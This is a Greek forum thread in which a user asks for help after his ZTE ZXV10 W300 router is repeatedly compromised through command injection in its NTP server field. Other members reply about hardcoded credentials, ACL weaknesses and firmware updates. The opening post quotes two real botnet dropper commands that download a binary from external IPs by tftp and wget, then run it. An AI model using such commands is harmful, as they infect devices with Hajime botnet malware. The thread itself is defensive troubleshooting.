Καλημέρα,
πριν λίγες μέρες άλλαξα το FritzBox! που είχα ως router στην vodafone γραμμή μου με ένα ZXV10 W300 που μου έχει μείνει από τον ΟΤΕ. Με χαρά είδα ότι συγχρονίζει σε μεγαλύτερη ταχύτητα και είπα να το κρατήσω. Το πρόβλημα είναι όμως ότι παρατήρησα ότι στις ρυθμίσεις του NTP server και συγκεκριμένα στο πεδίο που βάζεις την διεύθυνση του, με κάποιο τρόπο η τιμή 0.0.0.0 (που είναι το default) αλλάξε σε:Αυτό προφανώς είναι command injection στο router μου!Κώδικας:`cd /tmp;tftp -l4 -r4 -g 79.167.240.121 28801;chmod 777 4;./4`
Για να εμποδίσω αυτό έχω προβεί σε διάφορες ενέργειες όπως είναι:
- Στο ACL επιτρέπω πρόσβαση (Web, telnet, FTP, TFTP, SNMP και Ping) μόνο στο LAN interface
- Έχω αλλάξει τον κωδικό στους δύο default χρήστες του router και στον admin
- Έχω απενεργοποιήσει το samba που είχε κρυφά ενεργοποιημένο
- Γενικά έχω αλλάξει όλα τα default passwords του configuration σε δικά μου
Το πρόβλημα είναι ότι παρόλα αυτά, το πεδίο αυτό συνεχίζει να αλλάζει σε τέτοιου είδους command injections (με διαφορετικές IP κάθε φορά) ακόμα και αν βάλω την ρύθμιση της ώρας σε manual...
π.χ. ένα ακόμα είναι:Τέλος, μπήκα με telnet στο router και όντως βρήκα το αρχείο /tmp/4 με δικαιώματα rwx από όλους τους χρήστες και το οποίο σύμφωνα με το VirusTotal είναι το Linux/Hajime-A botnet!Κώδικας:`cd /tmp;wget http://79.167.103.92:55483/4;chmod 777 4;./4`
Υ.Γ. Το firmware του router είναι το W300V1.1.3k_ZRD_GR2_A68
Εμφάνιση 1-7 από 7
-
15-12-17, 10:22 Μου χακάρουν το ZXV10 W300! #1
Τελευταία επεξεργασία από το μέλος sotirisko : 15-12-17 στις 10:33. Αιτία: Υ.Γ.
-
15-12-17, 11:48 Απάντηση: Μου χακάρουν το ZXV10 W300! #2
Το router σου έχει hardcoded credentials, όσους κωδικούς και να αλλάξεις, τζίφος
Δες εδώ: https://www.exploit-db.com/exploits/31527/Όλα τα παιχνίδια android που έχω φτιάξει περιγράφονται και κατεβαίνουν
από εδώ: https://play.google.com/store/apps/d...=Carbon+People
-
15-12-17, 11:54 Απάντηση: Μου χακάρουν το ZXV10 W300! #3
Ναι, το είχα βρει αυτό το exploit αλλά:
1) Έχω μπλοκάρει την πρόσβαση σε telnet από το WAN (από το ACL επιτρέπω telnet μόνο σε LAN θεωρητικά πάντα)
2) Δοκίμασα να μπω με telnet χρησιμοποιώντας αυτό το password αλλά δεν έμπαινε οπότε θεώρησα ότι στην έκδοση του firmware που έχω έχει διορθωθεί αυτό (το exploit είναι από το 2014)
-
15-12-17, 12:50 Απάντηση: Μου χακάρουν το ZXV10 W300! #4
Προσφατα υπαρχει και το wifi wpa2 hack που θελει αναβαθμηση και το modem (αλλα και η καρτα στο laptop, κινητο κλπ)
https://www.techadvisor.co.uk/how-to...-wifi-3665453/
θα ελεγα να το ξεχασεις, εγω εχω να βαλω επανω απο οταν μου το πρωτο εδωσαν (5 χρονια)
-
15-12-17, 13:57 Απάντηση: Μου χακάρουν το ZXV10 W300! #5
Νομίζω ότι είχα δεί το W300V1.1.3k_ZRD_GR2_D68 σαν τελευταίο, ή κάνω λάθος.
Υπάρχει φυσικά πιθανότητα ήδη να είχε μόνιμα εγκατεστημένο bakcdoor το router σου
και μόνο με reset/firmware upgrade το αφαιρέσεις.
Σε κάθε περίπτωση, οι ACL λίστες δεν παρέχουν προστασία, έχει γραφεί παντού μια και τόσο
το ip, όσο και το mac γίνονται hijack με ARP spoofing ακόμα over wifi πριν το auth.
Προτείνω firmware upgrade + reset πριν συνεχίσεις...Όλα τα παιχνίδια android που έχω φτιάξει περιγράφονται και κατεβαίνουν
από εδώ: https://play.google.com/store/apps/d...=Carbon+People
-
15-12-17, 15:00 Απάντηση: Μου χακάρουν το ZXV10 W300! #6
καπου ειχα το site του οτε με το link για λογισμικα, σε αναβαθμηση του ZTE 300, το εχει κανεις αν εβγαλε αυτο το μηνα καινουριο λογισμικο με το wpa2 hack?
-
15-12-17, 16:58 Απάντηση: Μου χακάρουν το ZXV10 W300! #7
Ναι, το γνωρίζω το WPA2 hack αλλά η περιπτωσή μου δεν σχετίζεται με αυτό...
Προς το παρόν έκανα ακόμα ένα factory reset και παρατήρησα ότι αν βάλω σαν NTP server έναν δικό μου και όχι 0.0.0.0 δεν αλλάζει μετά σε command injection (τουλάχιστον μέχρι τώρα). Επομένως μπορεί να παίζει και θέμα με τον default NTP server της ZTE...
Παρόμοια Θέματα
-
ADSL WIND και modem ZTE ZXV10 H108L
Από dimivasi στο φόρουμ WindΜηνύματα: 1646Τελευταίο Μήνυμα: 08-10-20, 21:47 -
ΔΕΝ ΜΟΥ ΚΡΑΤΑΕΙ ΤΟ ΟΛΟΓΡΑΦΩΣ ΣΤΗΝ ΑΠΟΘΗΚΕΥΣΗ ΚΑΙ ΣΤΗΝ ΕΚΤΥΠΩΣΗ
Από ddiid στο φόρουμ Προγραμματισμός και γλώσσες προγραμματισμούΜηνύματα: 0Τελευταίο Μήνυμα: 07-08-17, 15:30 -
ZXV10 H201L CYTA απενεργοποίηση WPS
Από amyntaio στο φόρουμ ADSLΜηνύματα: 6Τελευταίο Μήνυμα: 30-06-17, 23:36 -
ZXV10 H201L bridge mode
Από georgecl στο φόρουμ ADSLΜηνύματα: 3Τελευταίο Μήνυμα: 07-04-17, 11:13 -
[Other] ZTE ZXV10 H201L σε Globespan DSLAM
Από alexnts στο φόρουμ ADSL & Broadband Hardware, routers και modems...Μηνύματα: 1Τελευταίο Μήνυμα: 02-02-17, 10:27
Bookmarks